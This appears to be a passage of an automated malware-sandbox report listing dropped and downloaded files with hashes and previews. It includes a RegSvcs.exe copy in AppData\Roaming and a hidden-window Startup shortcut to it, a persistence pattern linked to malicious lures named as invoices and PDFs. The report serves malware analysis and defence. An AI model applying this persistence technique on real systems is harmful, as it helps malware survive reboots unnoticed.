SHA-256:	8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
SHA-512:	CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czy1kgfw.l21.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_makrtgqn.grx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n3dprjsx.wq5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozozatgv.04a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9837461384449653
Encrypted:	false
SSDEEP:	48:8kdLTTrYnH7idAKZdA1kLehwiZUklqehwy+3:8w7YkLy
MD5:	EDEAC547B1249AF89B05B9D3C2AAA8F1
SHA1:	16F23F70814E6C64893B7BFF120F6679C3B18DAE
SHA-256:	C8A96ED03CDA26188ECF4B11E5968979F88933688F75494A036B43A3997AED54
SHA-512:	BF4AEF7759617DEE394D77AD6CC5B2230DA2AAFAA54370DABAF2309973314C2E3CFE20ED2F0EF301AC2699753300B9C83D4BC2CF8F89651E5C15FCD43812BC64
Malicious:	false
Preview:	L..................F.@.. ...$+.,.............v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.XL>....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.99877386538284
Encrypted:	false
SSDEEP:	48:8qdLTTrYnH7idAKZdA1DLeh/iZUkAQkqeh7y+2:8W7Y49QSy
MD5:	CCD656396D059DD700DC86C9ABB23BDF
SHA1:	656EC3BEA08FF636CB7D3B48B2E43596B8C44B57
SHA-256:	06209C10C3C40D5B72393307C8BA44AA83B1FDCF4A2BE380C0767A57F6C8BB59
SHA-512:	72E5DA8FCA7E758344CD41FFAC38A3A84686F5B6719FB4C72DA85FD9D11D07C71EA5746BBA9132FE95D0B30233A0842C0C03C67D3237AEA1F8521E68804AF64A
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Y.........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.XL>....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 13:13:28 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2691
Entropy (8bit):	4.009802073047307
Encrypted:	false
SSDEEP:	48:8ydLTTrCnH7idAKZdA14PLeh7sFiZUkmgqeh7sly+BX:8e7C+nXy
MD5:	D9C1417B875DB9CDFAC5A9E031EB4D81
SHA1:	01A282CDEE2A5AC9B3AFC2D184D8BF36B7E277E4
SHA-256:	FAA4CF98EC2B325B8B2F674D1C45C08457CB95A8436256273502C36590F4EC30
SHA-512:	32B878ED9A9C4958C7B165BE56064177EFB076E3FEE6BD3774BFE030C85CE943544604F93D55FDD027278A0BCE54F13266AF9F9F07D0A668950AF77C2E1C13F6
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....k........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.q....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9936757169265027
Encrypted:	false
SSDEEP:	48:8MdLTTrYnH7idAKZdA1mLehDiZUkwqehPy+R:8Y7Y9dy
MD5:	C5F41AAEE088EDD9EBE94B88E4B53445
SHA1:	2285EAFF207328771EB2A96005D71D9C2563FED8
SHA-256:	97F5BC1DADBDEED863EC123B8DF8A1A7FA628A1132FF7579FC271AB2F8732CD9
SHA-512:	C8D812532EF49FAD4194E692C250375D955500477574BD30575E830F5D617EBB86EDD1D02BC2BDE1238C7449FABD454CFAD595B740A78F78F98BA67C8D17F039
Malicious:	false
Preview:	L..................F.@.. ...$+.,....E.........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.XL>....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:23 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9845572370338096
Encrypted:	false
SSDEEP:	48:8TdLTTrYnH7idAKZdA1oLehBiZUk1W1qehRy+C:857Y99xy
MD5:	AA85239C30DEFF562491A135762CE8F0
SHA1:	5DD50484AA5053EBC5C896FE2E1D25C3F19A6C6D
SHA-256:	57D2C6429C3484D11728D5F9350737FAAF373750276538DE7461C5A730660B98
SHA-512:	DB7E26460E18A1B2C4E9BC232042CDACC85AA225E9837A6DA332C1B6B325BBD866894A6AB782216CB9A79F0608D12D485CE1A3AD70204B239CDCD7AB6EDA89AA
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....Z........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.XL>....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat May 4 06:50:22 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9993523970232063
Encrypted:	false
SSDEEP:	48:8ydLTTrYnH7idAKZdA1duTBLehOuTbbiZUk5OjqehOuTbXy+yT+:8e7YKT6TbxWOvTbXy7T
MD5:	038C63B07CAC559DB9A1FF0758DD31FD
SHA1:	9FD60B7697A8366F8E109D8122FF11BDB20A5570
SHA-256:	E813BCB53750F6FFAAC997D7986DA85E6F5147C0C2DFA7E3A646DC143E6EB747
SHA-512:	678C3A4BC590F652A88DC05C01AA7DC2D094B56D7C2F9FC54CC068D9D84013911FBEDA825F2098A5488161C2C61A9B37102E52AE6C979B558486F14A7EBFB455
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Z.........v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.q..PROGRA~1..t......O.I.XJ>....B...............J.....o4_.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XJ>....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.f..Chrome..>......CW.V.XJ>....M.....................c...C.h.r.o.m.e.....`.1.....EW.f..APPLIC~1..H......CW.V.XJ>...........................P..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.XL>....O......................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............B.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:50:55 2024, mtime=Sat May 4 06:50:55 2024, atime=Sat May 4 06:50:55 2024, length=45984, window=hide
Category:	dropped
Size (bytes):	764
Entropy (8bit):	5.10318029337425
Encrypted:	false
SSDEEP:	12:8Dkf24xdsdChSfaY//mbdNVgeLGy5jAsuHwmPxYu+3u+HGmV:84bv45fZ+FfN9As0pYueu/m
MD5:	103A4A59EFA703FA2F9F392967B010EA
SHA1:	F014490AFF12627FADE5A42EFCC4F66163C3988F
SHA-256:	0412926E341E5FDED2603CACDD2E9D7938AE51EBC42FF3D0827A63B1A379AA31
SHA-512:	0E2F9FA5A604CE6104D2A9F0A6AD43A78C7560F514A661E86AF266D4341A52E422428414828B49CD96F8D5BE94E47D83CF5DC47E9A5270378C07B30215E4E157
Malicious:	false
Preview:	L..................F.... ....;w......bw......bw.............................v.:..DG..Yr?.D..U..k0.&...&........P7......................t...CFSF..1.....EW.p..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.p.X:>....~.....................GS@.A.p.p.D.a.t.a...B.V.1......X7>..Roaming.@......EW.p.X7>..............................R.o.a.m.i.n.g.....b.2......X\> .RegSvcs.exe.H......X\>.X\>........................../...R.e.g.S.v.c.s...e.x.e.......Y...............-.......X............B.......C:\Users\user\AppData\Roaming\RegSvcs.exe........\.....\.....\.....\.....\.R.e.g.S.v.c.s...e.x.e.`.......X.......642294...........hT..CrF.f4... ..........-....-.hT..CrF.f4... ..........-....-.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\RegSvcs.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: I7336446-receipt.vbs, Detection: malicious, Browse Filename: S94847456-receipt.vbs, Detection: malicious, Browse Filename: Transfer copy PDF.exe, Detection: malicious, Browse Filename: PO# CV-PO23002552.PDF.exe, Detection: malicious, Browse Filename: Deposit payment copy PDF.exe, Detection: malicious, Browse Filename: Approved E-DO PDF.exe, Detection: malicious, Browse Filename: PO# CV-PO23002552.exe, Detection: malicious, Browse Filename: Invoice Checklist.exe, Detection: malicious, Browse Filename: H223070141&H223070191.exe, Detection: malicious, Browse Filename: overdue Balance.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2294)
Category:	downloaded
Size (bytes):	163286
Entropy (8bit):	5.544045381504343
Encrypted:	false
SSDEEP:	3072:CMiFOP4roKgkk/EFZMQbxjZW1BKo6JMI6l0nt8Uv1ziwtXOmDsY+WwYLF/HrY7+A:CMiroKfbMQbxjZW1BKo6JMI6l0nt8Uvq
MD5:	9D9987F6E83F101A097A0BD64A14C71B
SHA1:	E71E10897E0E874DE4D12125D5DF2F7FCE08F585
SHA-256:	D0975FC00A61201A54714BE8DF5E50F02B277E133BA08ABD9DEEA33934FA28A9
SHA-512:	5AE557145F0E0FF3E768AFC63B3E4855F53DCA49D46A22ACB169CC6DC58FF2B11C776B419141EB12C8B0CF7BBD16E928F9EE5AF5014DD976130B00A1995B325E
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Ics7SFQVxbg.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTtpRznzVJk75Y4TcT-zpGGUjebtAg"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.cj=function(a,b,c){return c?a\|b:a&~b};_.dj=function(a,b,c,d){a=_.jb(a,b,c,d);return Array.isArray(a)?a:_.kc};_.ej=function(a,b){a=_.cj(a,2,!!(2&b));a=_.cj(a,32,!0);return a=_.cj(a,2048,!1)};_.fj=function(a,b){0===a&&(a=_.ej(a,b));return a=_.cj(a,1,!0)};_.gj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.hj=function(a,b,c){32&b&&c\|\|(a=_.cj(a,32,!1));return a};._.ij=function(a,b,c,d,e,f){var g=!!(2&b),h=g?1:2;const k=1===h;h=2===h;e=!!e;f&&(f=!g);g=_.dj(a,b,d);var l=g[_.v]\|0;const n=!!(4&l);if(!n){l=_.fj(l,b);var p=g,t=b,r;(r=!!(2&l))&&(t=_.cj(t,2,!0));let B=!r,aa=!0,K=0,F=0;for(;K<p.length;K++){const ba=_.Ua(p[K],c,t);if(ba instanceof c){if(!r){const Ca=!!((ba.ka[_.v]\|0)&2);B&&(B=!Ca);aa&&(aa=Ca)}p[F++]=ba}}F<K&&(p.length=F);l=_.cj(l,4,!0);l=_.cj(l,16,aa);l=_.cj(l,8,B);_.ya(p,l);r&&Object.freeze(p)}c=!!(8&l)\|\|k&&!g.length;if(f&&!c){_.gj(l)&&(g=_.xa(g),.l=_.ej(l,b),b=_.ib(a,b,d,g));f=g;c=l;for(p=0;p<f.length;p++)l=f[p],t=_

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3738)
Category:	downloaded
Size (bytes):	3743
Entropy (8bit):	5.8270615527180345
Encrypted:	false
SSDEEP:	96:yS5li5bFd66666GxOQeF91oip7QXoQA55cOggtfffQfo:jviFd66666GRsQiVQts
MD5:	138B647036E1F2040C6FFE0262BB69BA
SHA1:	3D8E71370B710FFDAE7E4E5AE03C30E635893CA1
SHA-256:	21911CB27D22BFAFCCCD033B7E316960B0BCDD0BEB96D81F65EB2110F1B3C036
SHA-512:	4428D28BB54C8CAF53DFE8FABBA8EDBEB22E5B96D35431A0B267FA0ED0B62FD783403D31D6EB721F22A6475D7F15E788C182A4AEE6BA01B14EDC79BC958AAAA3
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["ghosts season 4","sam ash music stores closing","wrexham afc players","texas tornadoes","ncis hawaii cbs","americans turks and caicos ammunition","mike trout injury","mega millions winning numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXB4M2NzczgwEiROQ0lTOiBIYXdhacq7aSDigJQgVGVsZXZpc2lvbiBzZXJpZXMykxBkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFjQUFBQ0FnTUJBUUFBQUFBQUFBQUFBQUFGQmdRSEFRSURBQWoveEFBeEVBQUNBUU1EQWdVREFnWURBQUFBQUFBQkFnTUVCUkVBRWlFeFFRWVRVV0Z4RkNLUkZUSWpVb0hCNGZB

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3572), with no line terminators
Category:	downloaded
Size (bytes):	3572
Entropy (8bit):	5.140651484312947
Encrypted:	false
SSDEEP:	48:vZUJVKLICJEconBdpZUvGCUvGULHg7OTehn5hsbrc7g8IO8u0Y8D2n:yJYI/coXqCg7OSfg8IO8uB8D2n
MD5:	122C0858F7D38991F14E5ADC6BDB3C3B
SHA1:	FFC64755EB42990A73C4878426A641CFB94B57EE
SHA-256:	06D1296A6F6611AC795B27882FE88823EE857D0F49F7018CF00C6A199976DC0D
